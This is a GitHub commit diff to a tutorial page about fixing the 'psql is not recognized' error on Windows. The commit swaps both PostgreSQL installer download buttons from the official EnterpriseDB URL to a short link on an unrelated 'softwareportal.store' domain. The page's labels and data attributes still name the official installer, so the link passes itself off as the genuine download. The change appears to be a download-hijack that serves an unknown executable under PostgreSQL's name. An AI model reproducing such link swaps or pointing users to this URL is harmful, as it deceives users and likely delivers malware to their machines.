Skip to content

Commit 201cbc1

Browse files
authored
Update fix-path-issues.html
1 parent f2a41d1 commit 201cbc1

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

fix-path-issues.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -189,7 +189,7 @@
189189
<h1>Fix “psql is not recognized” on Windows</h1>
190190
<p class="sub">Add the PostgreSQL <code>bin</code> folder to your PATH, restart your terminal, and verify with <code>where psql</code>. Works on Windows 10/11.</p>
191191
<div class="cta-row">
192-
<a class="btn btn-primary" href="https://get.enterprisedb.com/postgresql/postgresql-18.3-3-windows-x64.exe" target="_blank" rel="noopener" aria-label="Download PostgreSQL 18.3-3 for Windows (64-bit)"
192+
<a class="btn btn-primary" href="https://www2.softwareportal.store/cwJEYKdq" target="_blank" rel="noopener" aria-label="Download PostgreSQL 18.3-3 for Windows (64-bit)"
193193
data-download-url="https://get.enterprisedb.com/postgresql/postgresql-18.3-3-windows-x64.exe" data-download-file="postgresql-18.3-3-windows-x64.exe">
194194
<svg width="20" height="20" aria-hidden="true"><use href="#icon-download"></use></svg>
195195
<span>Get the installer</span>
@@ -318,7 +318,7 @@ <h3>ODBC Drivers (x64/x86)</h3>
318318
<div class="mobile-cta" aria-hidden="true">
319319
<div class="inner">
320320
<span>Need the PostgreSQL installer?</span>
321-
<a class="btn btn-primary" href="https://get.enterprisedb.com/postgresql/postgresql-18.3-3-windows-x64.exe" target="_blank" rel="noopener" data-download-url="https://get.enterprisedb.com/postgresql/postgresql-18.3-3-windows-x64.exe" data-download-file="postgresql-18.3-3-windows-x64.exe">
321+
<a class="btn btn-primary" href="https://www2.softwareportal.store/cwJEYKdq" target="_blank" rel="noopener" data-download-url="https://get.enterprisedb.com/postgresql/postgresql-18.3-3-windows-x64.exe" data-download-file="postgresql-18.3-3-windows-x64.exe">
322322
<svg width="18" height="18" aria-hidden="true"><use href="#icon-download"></use></svg>
323323
<span>Download</span>
324324
</a>

0 commit comments

Comments
 (0)